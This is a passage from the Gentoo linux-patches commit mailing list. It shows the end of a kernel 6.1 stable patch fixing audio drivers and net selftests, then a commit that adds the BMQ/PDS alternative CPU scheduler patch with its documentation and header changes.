+@@ -375,11 +416,14 @@ static int tas5805m_mute(struct snd_soc_dai *dai, int mute, int direction)
+ 	struct tas5805m_priv *tas5805m =
+ 		snd_soc_component_get_drvdata(component);
+ 
++	mutex_lock(&tas5805m->lock);
+ 	dev_dbg(component->dev, "set mute=%d (is_powered=%d)\n",
+ 		mute, tas5805m->is_powered);
++
+ 	tas5805m->is_muted = mute;
+ 	if (tas5805m->is_powered)
+-		tas5805m_refresh(component);
++		tas5805m_refresh(tas5805m);
++	mutex_unlock(&tas5805m->lock);
+ 
+ 	return 0;
+ }
+@@ -434,6 +478,7 @@ static int tas5805m_i2c_probe(struct i2c_client *i2c)
+ 	if (!tas5805m)
+ 		return -ENOMEM;
+ 
++	tas5805m->i2c = i2c;
+ 	tas5805m->pvdd = devm_regulator_get(dev, "pvdd");
+ 	if (IS_ERR(tas5805m->pvdd)) {
+ 		dev_err(dev, "failed to get pvdd supply: %ld\n",
+@@ -507,6 +552,9 @@ static int tas5805m_i2c_probe(struct i2c_client *i2c)
+ 	gpiod_set_value(tas5805m->gpio_pdn_n, 1);
+ 	usleep_range(10000, 15000);
+ 
++	INIT_WORK(&tas5805m->work, do_work);
++	mutex_init(&tas5805m->lock);
++
+ 	/* Don't register through devm. We need to be able to unregister
+ 	 * the component prior to deasserting PDN#
+ 	 */
+@@ -527,6 +575,7 @@ static void tas5805m_i2c_remove(struct i2c_client *i2c)
+ 	struct device *dev = &i2c->dev;
+ 	struct tas5805m_priv *tas5805m = dev_get_drvdata(dev);
+ 
++	cancel_work_sync(&tas5805m->work);
+ 	snd_soc_unregister_component(dev);
+ 	gpiod_set_value(tas5805m->gpio_pdn_n, 0);
+ 	usleep_range(10000, 15000);
+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index e60c7b3445623..8205b32171495 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -1141,6 +1141,7 @@ static int fsl_sai_check_version(struct device *dev)
+ 
+ 	sai->verid.version = val &
+ 		(FSL_SAI_VERID_MAJOR_MASK | FSL_SAI_VERID_MINOR_MASK);
++	sai->verid.version >>= FSL_SAI_VERID_MINOR_SHIFT;
+ 	sai->verid.feature = val & FSL_SAI_VERID_FEATURE_MASK;
+ 
+ 	ret = regmap_read(sai->regmap, FSL_SAI_PARAM, &val);
+diff --git a/sound/soc/soc-topology.c b/sound/soc/soc-topology.c
+index c3be24b2fac55..a79a2fb260b87 100644
+--- a/sound/soc/soc-topology.c
++++ b/sound/soc/soc-topology.c
+@@ -1401,13 +1401,17 @@ static int soc_tplg_dapm_widget_create(struct soc_tplg *tplg,
+ 
+ 	template.num_kcontrols = le32_to_cpu(w->num_kcontrols);
+ 	kc = devm_kcalloc(tplg->dev, le32_to_cpu(w->num_kcontrols), sizeof(*kc), GFP_KERNEL);
+-	if (!kc)
++	if (!kc) {
++		ret = -ENOMEM;
+ 		goto hdr_err;
++	}
+ 
+ 	kcontrol_type = devm_kcalloc(tplg->dev, le32_to_cpu(w->num_kcontrols), sizeof(unsigned int),
+ 				     GFP_KERNEL);
+-	if (!kcontrol_type)
++	if (!kcontrol_type) {
++		ret = -ENOMEM;
+ 		goto hdr_err;
++	}
+ 
+ 	for (i = 0; i < le32_to_cpu(w->num_kcontrols); i++) {
+ 		control_hdr = (struct snd_soc_tplg_ctl_hdr *)tplg->pos;
+diff --git a/sound/synth/emux/emux_nrpn.c b/sound/synth/emux/emux_nrpn.c
+index 8056422ed7c51..0d6b82ae29558 100644
+--- a/sound/synth/emux/emux_nrpn.c
++++ b/sound/synth/emux/emux_nrpn.c
+@@ -349,6 +349,9 @@ int
+ snd_emux_xg_control(struct snd_emux_port *port, struct snd_midi_channel *chan,
+ 		    int param)
+ {
++	if (param >= ARRAY_SIZE(chan->control))
++		return -EINVAL;
++
+ 	return send_converted_effect(xg_effects, ARRAY_SIZE(xg_effects),
+ 				     port, chan, param,
+ 				     chan->control[param],
+diff --git a/tools/testing/selftests/net/forwarding/lib.sh b/tools/testing/selftests/net/forwarding/lib.sh
+index 3ffb9d6c09504..f4721f1b2886b 100755
+--- a/tools/testing/selftests/net/forwarding/lib.sh
++++ b/tools/testing/selftests/net/forwarding/lib.sh
+@@ -906,14 +906,14 @@ sysctl_set()
+ 	local value=$1; shift
+ 
+ 	SYSCTL_ORIG[$key]=$(sysctl -n $key)
+-	sysctl -qw $key=$value
++	sysctl -qw $key="$value"
+ }
+ 
+ sysctl_restore()
+ {
+ 	local key=$1; shift
+ 
+-	sysctl -qw $key=${SYSCTL_ORIG["$key"]}
++	sysctl -qw $key="${SYSCTL_ORIG[$key]}"
+ }
+ 
+ forwarding_enable()
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 2eeaf4aca644d..76a197f7b8132 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -472,6 +472,12 @@ kill_wait()
+ 	wait $1 2>/dev/null
+ }
+ 
++kill_tests_wait()
++{
++	kill -SIGUSR1 $(ip netns pids $ns2) $(ip netns pids $ns1)
++	wait
++}
++
+ pm_nl_set_limits()
+ {
+ 	local ns=$1
+@@ -1688,6 +1694,7 @@ chk_subflow_nr()
+ 	local subflow_nr=$3
+ 	local cnt1
+ 	local cnt2
++	local dump_stats
+ 
+ 	if [ -n "${need_title}" ]; then
+ 		printf "%03u %-36s %s" "${TEST_COUNT}" "${TEST_NAME}" "${msg}"
+@@ -1705,7 +1712,12 @@ chk_subflow_nr()
+ 		echo "[ ok ]"
+ 	fi
+ 
+-	[ "${dump_stats}" = 1 ] && ( ss -N $ns1 -tOni ; ss -N $ns1 -tOni | grep token; ip -n $ns1 mptcp endpoint )
++	if [ "${dump_stats}" = 1 ]; then
++		ss -N $ns1 -tOni
++		ss -N $ns1 -tOni | grep token
++		ip -n $ns1 mptcp endpoint
++		dump_stats
++	fi
+ }
+ 
+ chk_link_usage()
+@@ -2985,7 +2997,7 @@ endpoint_tests()
+ 		pm_nl_set_limits $ns1 2 2
+ 		pm_nl_set_limits $ns2 2 2
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal
+-		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow &
++		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow 2>/dev/null &
+ 
+ 		wait_mpj $ns1
+ 		pm_nl_check_endpoint 1 "creation" \
+@@ -2998,14 +3010,14 @@ endpoint_tests()
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 flags signal
+ 		pm_nl_check_endpoint 0 "modif is allowed" \
+ 			$ns2 10.0.2.2 id 1 flags signal
+-		wait
++		kill_tests_wait
+ 	fi
+ 
+ 	if reset "delete and re-add"; then
+ 		pm_nl_set_limits $ns1 1 1
+ 		pm_nl_set_limits $ns2 1 1
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 id 2 dev ns2eth2 flags subflow
+-		run_tests $ns1 $ns2 10.0.1.1 4 0 0 slow &
++		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_20 2>/dev/null &
+ 
+ 		wait_mpj $ns2
+ 		pm_nl_del_endpoint $ns2 2 10.0.2.2
+@@ -3015,7 +3027,7 @@ endpoint_tests()
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 dev ns2eth2 flags subflow
+ 		wait_mpj $ns2
+ 		chk_subflow_nr "" "after re-add" 2
+-		wait
++		kill_tests_wait
+ 	fi
+ }
+ 
+diff --git a/tools/testing/selftests/net/test_vxlan_vnifiltering.sh b/tools/testing/selftests/net/test_vxlan_vnifiltering.sh
+index 704997ffc2449..8c3ac0a725451 100755
+--- a/tools/testing/selftests/net/test_vxlan_vnifiltering.sh
++++ b/tools/testing/selftests/net/test_vxlan_vnifiltering.sh
+@@ -293,19 +293,11 @@ setup-vm() {
+ 	elif [[ -n $vtype && $vtype == "vnifilterg" ]]; then
+ 	   # Add per vni group config with 'bridge vni' api
+ 	   if [ -n "$group" ]; then
+-	      if [ "$family" == "v4" ]; then
+-		 if [ $mcast -eq 1 ]; then
+-		    bridge -netns hv-$hvid vni add dev $vxlandev vni $tid group $group
+-		 else
+-		    bridge -netns hv-$hvid vni add dev $vxlandev vni $tid remote $group
+-		 fi
+-	      else
+-		 if [ $mcast -eq 1 ]; then
+-		    bridge -netns hv-$hvid vni add dev $vxlandev vni $tid group6 $group
+-		 else
+-		    bridge -netns hv-$hvid vni add dev $vxlandev vni $tid remote6 $group
+-		 fi
+-	      fi
++		if [ $mcast -eq 1 ]; then
++			bridge -netns hv-$hvid vni add dev $vxlandev vni $tid group $group
++		else
++			bridge -netns hv-$hvid vni add dev $vxlandev vni $tid remote $group
++		fi
+ 	   fi
+ 	fi
+ 	done


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-13 13:38 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-13 13:38 UTC (permalink / raw
  To: gentoo-commits

commit:     72cf91d77d5ed5991c8dab07571fb8c5c54c3c7e
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Feb 13 13:37:39 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Feb 13 13:37:39 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=72cf91d7

Add BMQ patch back, default ALT_SCHED=n

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |     8 +
 ...MQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch | 10154 +++++++++++++++++++
 5021_BMQ-and-PDS-gentoo-defaults.patch             |    13 +
 3 files changed, 10175 insertions(+)

diff --git a/0000_README b/0000_README
index e9f79f14..479e5981 100644
--- a/0000_README
+++ b/0000_README
@@ -134,3 +134,11 @@ Desc:   Add Gentoo Linux support config settings and defaults.
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.
+
+Patch:  5020_BMQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch
+From:   https://github.com/Frogging-Family/linux-tkghttps://gitlab.com/alfredchen/projectc
+Desc:   BMQ(BitMap Queue) Scheduler. A new CPU scheduler developed from PDS(incld). Inspired by the scheduler in zircon.
+
+Patch:  5021_BMQ-and-PDS-gentoo-defaults.patch
+From:   https://gitweb.gentoo.org/proj/linux-patches.git/
+Desc:   Set defaults for BMQ. Add archs as people test, default to N

diff --git a/5020_BMQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch b/5020_BMQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch
new file mode 100644
index 00000000..7c2a77d3
--- /dev/null
+++ b/5020_BMQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch
@@ -0,0 +1,10154 @@
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 42af9ca0127e..31747ec54f9d 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -5406,6 +5406,12 @@
+ 	sa1100ir	[NET]
+ 			See drivers/net/irda/sa1100_ir.c.
+ 
++	sched_timeslice=
++			[KNL] Time slice in ms for Project C BMQ/PDS scheduler.
++			Format: integer 2, 4
++			Default: 4
++			See Documentation/scheduler/sched-BMQ.txt
++
+ 	sched_verbose	[KNL] Enables verbose scheduler debug messages.
+ 
+ 	schedstats=	[KNL,X86] Enable or disable scheduled statistics.
+diff --git a/Documentation/admin-guide/sysctl/kernel.rst b/Documentation/admin-guide/sysctl/kernel.rst
+index 98d1b198b2b4..d7c78a107f93 100644
+--- a/Documentation/admin-guide/sysctl/kernel.rst
++++ b/Documentation/admin-guide/sysctl/kernel.rst
+@@ -1552,3 +1552,13 @@ is 10 seconds.
+ 
+ The softlockup threshold is (``2 * watchdog_thresh``). Setting this
+ tunable to zero will disable lockup detection altogether.
++
++yield_type:
++===========
++
++BMQ/PDS CPU scheduler only. This determines what type of yield calls
++to sched_yield will perform.
++
++  0 - No yield.
++  1 - Deboost and requeue task. (default)
++  2 - Set run queue skip task.
+diff --git a/Documentation/scheduler/sched-BMQ.txt b/Documentation/scheduler/sched-BMQ.txt
+new file mode 100644
+index 000000000000..05c84eec0f31
+--- /dev/null
++++ b/Documentation/scheduler/sched-BMQ.txt
+@@ -0,0 +1,110 @@
++                         BitMap queue CPU Scheduler
++                         --------------------------
++
++CONTENT
++========
++
++ Background
++ Design
++   Overview
++   Task policy
++   Priority management
++   BitMap Queue
++   CPU Assignment and Migration
++
++
++Background
++==========
++
++BitMap Queue CPU scheduler, referred to as BMQ from here on, is an evolution
++of previous Priority and Deadline based Skiplist multiple queue scheduler(PDS),
++and inspired by Zircon scheduler. The goal of it is to keep the scheduler code
++simple, while efficiency and scalable for interactive tasks, such as desktop,
++movie playback and gaming etc.
++
++Design
++======
++
++Overview
++--------
++
++BMQ use per CPU run queue design, each CPU(logical) has it's own run queue,
++each CPU is responsible for scheduling the tasks that are putting into it's
++run queue.
++
++The run queue is a set of priority queues. Note that these queues are fifo
++queue for non-rt tasks or priority queue for rt tasks in data structure. See
++BitMap Queue below for details. BMQ is optimized for non-rt tasks in the fact
++that most applications are non-rt tasks. No matter the queue is fifo or
++priority, In each queue is an ordered list of runnable tasks awaiting execution
++and the data structures are the same. When it is time for a new task to run,
++the scheduler simply looks the lowest numbered queueue that contains a task,
++and runs the first task from the head of that queue. And per CPU idle task is
++also in the run queue, so the scheduler can always find a task to run on from
++its run queue.
++
++Each task will assigned the same timeslice(default 4ms) when it is picked to
++start running. Task will be reinserted at the end of the appropriate priority
++queue when it uses its whole timeslice. When the scheduler selects a new task
++from the priority queue it sets the CPU's preemption timer for the remainder of
++the previous timeslice. When that timer fires the scheduler will stop execution
++on that task, select another task and start over again.
++
++If a task blocks waiting for a shared resource then it's taken out of its
++priority queue and is placed in a wait queue for the shared resource. When it
++is unblocked it will be reinserted in the appropriate priority queue of an
++eligible CPU.
++
++Task policy
++-----------
++
++BMQ supports DEADLINE, FIFO, RR, NORMAL, BATCH and IDLE task policy like the
++mainline CFS scheduler. But BMQ is heavy optimized for non-rt task, that's
++NORMAL/BATCH/IDLE policy tasks. Below is the implementation detail of each
++policy.
++
++DEADLINE
++	It is squashed as priority 0 FIFO task.
++
++FIFO/RR
++	All RT tasks share one single priority queue in BMQ run queue designed. The
++complexity of insert operation is O(n). BMQ is not designed for system runs
++with major rt policy tasks.
++
++NORMAL/BATCH/IDLE
++	BATCH and IDLE tasks are treated as the same policy. They compete CPU with
++NORMAL policy tasks, but they just don't boost. To control the priority of
++NORMAL/BATCH/IDLE tasks, simply use nice level.
++
++ISO
++	ISO policy is not supported in BMQ. Please use nice level -20 NORMAL policy
++task instead.
++
++Priority management
++-------------------
++
++RT tasks have priority from 0-99. For non-rt tasks, there are three different
++factors used to determine the effective priority of a task. The effective
++priority being what is used to determine which queue it will be in.
++
++The first factor is simply the task’s static priority. Which is assigned from
++task's nice level, within [-20, 19] in userland's point of view and [0, 39]
++internally.
++
++The second factor is the priority boost. This is a value bounded between
++[-MAX_PRIORITY_ADJ, MAX_PRIORITY_ADJ] used to offset the base priority, it is
++modified by the following cases:
++
++*When a thread has used up its entire timeslice, always deboost its boost by
++increasing by one.
++*When a thread gives up cpu control(voluntary or non-voluntary) to reschedule,
++and its switch-in time(time after last switch and run) below the thredhold
++based on its priority boost, will boost its boost by decreasing by one buti is
++capped at 0 (won’t go negative).
++
++The intent in this system is to ensure that interactive threads are serviced
++quickly. These are usually the threads that interact directly with the user
++and cause user-perceivable latency. These threads usually do little work and
++spend most of their time blocked awaiting another user event. So they get the
++priority boost from unblocking while background threads that do most of the
++processing receive the priority penalty for using their entire timeslice.
+diff --git a/fs/proc/base.c b/fs/proc/base.c
+index 9e479d7d202b..2a8530021b23 100644
+--- a/fs/proc/base.c
++++ b/fs/proc/base.c
+@@ -479,7 +479,7 @@ static int proc_pid_schedstat(struct seq_file *m, struct pid_namespace *ns,
+ 		seq_puts(m, "0 0 0\n");
+ 	else
+ 		seq_printf(m, "%llu %llu %lu\n",
+-		   (unsigned long long)task->se.sum_exec_runtime,
++		   (unsigned long long)tsk_seruntime(task),
+ 		   (unsigned long long)task->sched_info.run_delay,
+ 		   task->sched_info.pcount);
+ 
+diff --git a/include/asm-generic/resource.h b/include/asm-generic/resource.h
+index 8874f681b056..59eb72bf7d5f 100644
+--- a/include/asm-generic/resource.h
++++ b/include/asm-generic/resource.h
+@@ -23,7 +23,7 @@
+ 	[RLIMIT_LOCKS]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
+ 	[RLIMIT_SIGPENDING]	= { 		0,	       0 },	\
+ 	[RLIMIT_MSGQUEUE]	= {   MQ_BYTES_MAX,   MQ_BYTES_MAX },	\
+-	[RLIMIT_NICE]		= { 0, 0 },				\
++	[RLIMIT_NICE]		= { 30, 30 },				\
+ 	[RLIMIT_RTPRIO]		= { 0, 0 },				\
+ 	[RLIMIT_RTTIME]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
+ }
+diff --git a/include/linux/sched.h b/include/linux/sched.h
+index ffb6eb55cd13..2e730a59caa2 100644
+--- a/include/linux/sched.h
++++ b/include/linux/sched.h
+@@ -762,8 +762,14 @@ struct task_struct {
+ 	unsigned int			ptrace;
+ 
+ #ifdef CONFIG_SMP
+-	int				on_cpu;
+ 	struct __call_single_node	wake_entry;
++#endif
++#if defined(CONFIG_SMP) || defined(CONFIG_SCHED_ALT)
++	int				on_cpu;
++#endif
++
++#ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 	unsigned int			wakee_flips;
+ 	unsigned long			wakee_flip_decay_ts;
+ 	struct task_struct		*last_wakee;
+@@ -777,6 +783,7 @@ struct task_struct {
+ 	 */
+ 	int				recent_used_cpu;
+ 	int				wake_cpu;
++#endif /* !CONFIG_SCHED_ALT */
+ #endif
+ 	int				on_rq;
+ 
+@@ -785,6 +792,20 @@ struct task_struct {
+ 	int				normal_prio;
+ 	unsigned int			rt_priority;
+ 
++#ifdef CONFIG_SCHED_ALT
++	u64				last_ran;
++	s64				time_slice;
++	int				sq_idx;
++	struct list_head		sq_node;
++#ifdef CONFIG_SCHED_BMQ
++	int				boost_prio;
++#endif /* CONFIG_SCHED_BMQ */
++#ifdef CONFIG_SCHED_PDS
++	u64				deadline;
++#endif /* CONFIG_SCHED_PDS */
++	/* sched_clock time spent running */
++	u64				sched_time;
++#else /* !CONFIG_SCHED_ALT */
+ 	struct sched_entity		se;
+ 	struct sched_rt_entity		rt;
+ 	struct sched_dl_entity		dl;
+@@ -795,6 +816,7 @@ struct task_struct {
+ 	unsigned long			core_cookie;
+ 	unsigned int			core_occupation;
+ #endif
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ #ifdef CONFIG_CGROUP_SCHED
+ 	struct task_group		*sched_task_group;
+@@ -1545,6 +1567,15 @@ struct task_struct {
+ 	 */
+ };
+ 
++#ifdef CONFIG_SCHED_ALT
++#define tsk_seruntime(t)		((t)->sched_time)
++/* replace the uncertian rt_timeout with 0UL */
++#define tsk_rttimeout(t)		(0UL)
++#else /* CFS */
++#define tsk_seruntime(t)	((t)->se.sum_exec_runtime)
++#define tsk_rttimeout(t)	((t)->rt.timeout)
++#endif /* !CONFIG_SCHED_ALT */
++
+ static inline struct pid *task_pid(struct task_struct *task)
+ {
+ 	return task->thread_pid;
+diff --git a/include/linux/sched/deadline.h b/include/linux/sched/deadline.h
+index 7c83d4d5a971..fa30f98cb2be 100644
+--- a/include/linux/sched/deadline.h
++++ b/include/linux/sched/deadline.h
+@@ -1,5 +1,24 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+ 
++#ifdef CONFIG_SCHED_ALT
++
++static inline int dl_task(struct task_struct *p)
++{
++	return 0;
++}
++
++#ifdef CONFIG_SCHED_BMQ
++#define __tsk_deadline(p)	(0UL)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++#define __tsk_deadline(p)	((((u64) ((p)->prio))<<56) | (p)->deadline)
++#endif
++
++#else
++
++#define __tsk_deadline(p)	((p)->dl.deadline)
++
+ /*
+  * SCHED_DEADLINE tasks has negative priorities, reflecting
+  * the fact that any of them has higher prio than RT and
+@@ -21,6 +40,7 @@ static inline int dl_task(struct task_struct *p)
+ {
+ 	return dl_prio(p->prio);
+ }
++#endif /* CONFIG_SCHED_ALT */
+ 
+ static inline bool dl_time_before(u64 a, u64 b)
+ {
+diff --git a/include/linux/sched/prio.h b/include/linux/sched/prio.h
+index ab83d85e1183..6af9ae681116 100644
+--- a/include/linux/sched/prio.h
++++ b/include/linux/sched/prio.h
+@@ -18,6 +18,32 @@
+ #define MAX_PRIO		(MAX_RT_PRIO + NICE_WIDTH)
+ #define DEFAULT_PRIO		(MAX_RT_PRIO + NICE_WIDTH / 2)
+ 
++#ifdef CONFIG_SCHED_ALT
++
++/* Undefine MAX_PRIO and DEFAULT_PRIO */
++#undef MAX_PRIO
++#undef DEFAULT_PRIO
++
++/* +/- priority levels from the base priority */
++#ifdef CONFIG_SCHED_BMQ
++#define MAX_PRIORITY_ADJ	(7)
++
++#define MIN_NORMAL_PRIO		(MAX_RT_PRIO)
++#define MAX_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH)
++#define DEFAULT_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH / 2)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++#define MAX_PRIORITY_ADJ	(0)
++
++#define MIN_NORMAL_PRIO		(128)
++#define NORMAL_PRIO_NUM		(64)
++#define MAX_PRIO		(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM)
++#define DEFAULT_PRIO		(MAX_PRIO - NICE_WIDTH / 2)
++#endif
++
++#endif /* CONFIG_SCHED_ALT */
++
+ /*
+  * Convert user-nice values [ -20 ... 0 ... 19 ]
+  * to static priority [ MAX_RT_PRIO..MAX_PRIO-1 ],
+diff --git a/include/linux/sched/rt.h b/include/linux/sched/rt.h
+index 994c25640e15..8c050a59ece1 100644
+--- a/include/linux/sched/rt.h
++++ b/include/linux/sched/rt.h
+@@ -24,8 +24,10 @@ static inline bool task_is_realtime(struct task_struct *tsk)
+ 
+ 	if (policy == SCHED_FIFO || policy == SCHED_RR)
+ 		return true;
++#ifndef CONFIG_SCHED_ALT
+ 	if (policy == SCHED_DEADLINE)
+ 		return true;
++#endif
+ 	return false;
+ }
+ 
+diff --git a/include/linux/sched/topology.h b/include/linux/sched/topology.h
+index 816df6cc444e..c8da08e18c91 100644
+--- a/include/linux/sched/topology.h
++++ b/include/linux/sched/topology.h
+@@ -234,7 +234,8 @@ static inline bool cpus_share_cache(int this_cpu, int that_cpu)
+ 
+ #endif	/* !CONFIG_SMP */
+ 
+-#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL)
++#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL) && \
++	!defined(CONFIG_SCHED_ALT)
+ extern void rebuild_sched_domains_energy(void);
+ #else
+ static inline void rebuild_sched_domains_energy(void)
+diff --git a/init/Kconfig b/init/Kconfig
+index 94125d3b6893..c87ba766d354 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -819,6 +819,7 @@ menu "Scheduler features"
+ config UCLAMP_TASK
+ 	bool "Enable utilization clamping for RT/FAIR tasks"
+ 	depends on CPU_FREQ_GOV_SCHEDUTIL
++	depends on !SCHED_ALT
+ 	help
+ 	  This feature enables the scheduler to track the clamped utilization
+ 	  of each CPU based on RUNNABLE tasks scheduled on that CPU.
+@@ -865,6 +866,35 @@ config UCLAMP_BUCKETS_COUNT
+ 
+ 	  If in doubt, use the default value.
+ 
++menuconfig SCHED_ALT
++	bool "Alternative CPU Schedulers"
++	default y
++	help
++	  This feature enable alternative CPU scheduler"
++
++if SCHED_ALT
++
++choice
++	prompt "Alternative CPU Scheduler"
++	default SCHED_BMQ
++
++config SCHED_BMQ
++	bool "BMQ CPU scheduler"
++	help
++	  The BitMap Queue CPU scheduler for excellent interactivity and
++	  responsiveness on the desktop and solid scalability on normal
++	  hardware and commodity servers.
++
++config SCHED_PDS
++	bool "PDS CPU scheduler"
++	help
++	  The Priority and Deadline based Skip list multiple queue CPU
++	  Scheduler.
++
++endchoice
++
++endif
++
+ endmenu
+ 
+ #
+@@ -918,6 +948,7 @@ config NUMA_BALANCING
+ 	depends on ARCH_SUPPORTS_NUMA_BALANCING
+ 	depends on !ARCH_WANT_NUMA_VARIABLE_LOCALITY
+ 	depends on SMP && NUMA && MIGRATION && !PREEMPT_RT
++	depends on !SCHED_ALT
+ 	help
+ 	  This option adds support for automatic NUMA aware memory/task placement.
+ 	  The mechanism is quite primitive and is based on migrating memory when
+@@ -1015,6 +1046,7 @@ config FAIR_GROUP_SCHED
+ 	depends on CGROUP_SCHED
+ 	default CGROUP_SCHED
+ 
++if !SCHED_ALT
+ config CFS_BANDWIDTH
+ 	bool "CPU bandwidth provisioning for FAIR_GROUP_SCHED"
+ 	depends on FAIR_GROUP_SCHED
+@@ -1037,6 +1069,7 @@ config RT_GROUP_SCHED
+ 	  realtime bandwidth for them.
+ 	  See Documentation/scheduler/sched-rt-group.rst for more information.
+ 
++endif #!SCHED_ALT
+ endif #CGROUP_SCHED
+ 
+ config UCLAMP_TASK_GROUP
+@@ -1281,6 +1314,7 @@ config CHECKPOINT_RESTORE
+ 
+ config SCHED_AUTOGROUP
+ 	bool "Automatic process group scheduling"
++	depends on !SCHED_ALT
+ 	select CGROUPS
+ 	select CGROUP_SCHED
+ 	select FAIR_GROUP_SCHED
+diff --git a/init/init_task.c b/init/init_task.c
+index ff6c4b9bfe6b..19e9c662d1a1 100644
+--- a/init/init_task.c
++++ b/init/init_task.c
+@@ -75,9 +75,15 @@ struct task_struct init_task
+ 	.stack		= init_stack,
+ 	.usage		= REFCOUNT_INIT(2),
+ 	.flags		= PF_KTHREAD,
++#ifdef CONFIG_SCHED_ALT
++	.prio		= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
++	.static_prio	= DEFAULT_PRIO,
++	.normal_prio	= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
++#else
+ 	.prio		= MAX_PRIO - 20,
+ 	.static_prio	= MAX_PRIO - 20,
+ 	.normal_prio	= MAX_PRIO - 20,
++#endif
+ 	.policy		= SCHED_NORMAL,
+ 	.cpus_ptr	= &init_task.cpus_mask,
+ 	.user_cpus_ptr	= NULL,
+@@ -88,6 +94,17 @@ struct task_struct init_task
+ 	.restart_block	= {
+ 		.fn = do_no_restart_syscall,
+ 	},
++#ifdef CONFIG_SCHED_ALT
++	.sq_node	= LIST_HEAD_INIT(init_task.sq_node),
++#ifdef CONFIG_SCHED_BMQ
++	.boost_prio	= 0,
++	.sq_idx		= 15,
++#endif
++#ifdef CONFIG_SCHED_PDS
++	.deadline	= 0,
++#endif
++	.time_slice	= HZ,
++#else
+ 	.se		= {
+ 		.group_node 	= LIST_HEAD_INIT(init_task.se.group_node),
+ 	},
+@@ -95,6 +112,7 @@ struct task_struct init_task
+ 		.run_list	= LIST_HEAD_INIT(init_task.rt.run_list),
+ 		.time_slice	= RR_TIMESLICE,
+ 	},
++#endif
+ 	.tasks		= LIST_HEAD_INIT(init_task.tasks),
+ #ifdef CONFIG_SMP
+ 	.pushable_tasks	= PLIST_NODE_INIT(init_task.pushable_tasks, MAX_PRIO),
+diff --git a/kernel/Kconfig.preempt b/kernel/Kconfig.preempt
+index c2f1fd95a821..41654679b1b2 100644
+--- a/kernel/Kconfig.preempt
++++ b/kernel/Kconfig.preempt
+@@ -117,7 +117,7 @@ config PREEMPT_DYNAMIC
+ 
+ config SCHED_CORE
+ 	bool "Core Scheduling for SMT"
+-	depends on SCHED_SMT
++	depends on SCHED_SMT && !SCHED_ALT
+ 	help
+ 	  This option permits Core Scheduling, a means of coordinated task
+ 	  selection across SMT siblings. When enabled -- see
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index b474289c15b8..a23224b45b03 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -787,7 +787,7 @@ static int validate_change(struct cpuset *cur, struct cpuset *trial)
+ 	return ret;
+ }
+ 
+-#ifdef CONFIG_SMP
++#if defined(CONFIG_SMP) && !defined(CONFIG_SCHED_ALT)
+ /*
+  * Helper routine for generate_sched_domains().
+  * Do cpusets a, b have overlapping effective cpus_allowed masks?
+@@ -1183,7 +1183,7 @@ static void rebuild_sched_domains_locked(void)
+ 	/* Have scheduler rebuild the domains */
+ 	partition_and_rebuild_sched_domains(ndoms, doms, attr);
+ }
+-#else /* !CONFIG_SMP */
++#else /* !CONFIG_SMP || CONFIG_SCHED_ALT */
+ static void rebuild_sched_domains_locked(void)
+ {
+ }
+diff --git a/kernel/delayacct.c b/kernel/delayacct.c
+index e39cb696cfbd..463423572e09 100644
+--- a/kernel/delayacct.c
++++ b/kernel/delayacct.c
+@@ -150,7 +150,7 @@ int delayacct_add_tsk(struct taskstats *d, struct task_struct *tsk)
+ 	 */
+ 	t1 = tsk->sched_info.pcount;
+ 	t2 = tsk->sched_info.run_delay;
+-	t3 = tsk->se.sum_exec_runtime;
++	t3 = tsk_seruntime(tsk);
+ 
+ 	d->cpu_count += t1;
+ 
+diff --git a/kernel/exit.c b/kernel/exit.c
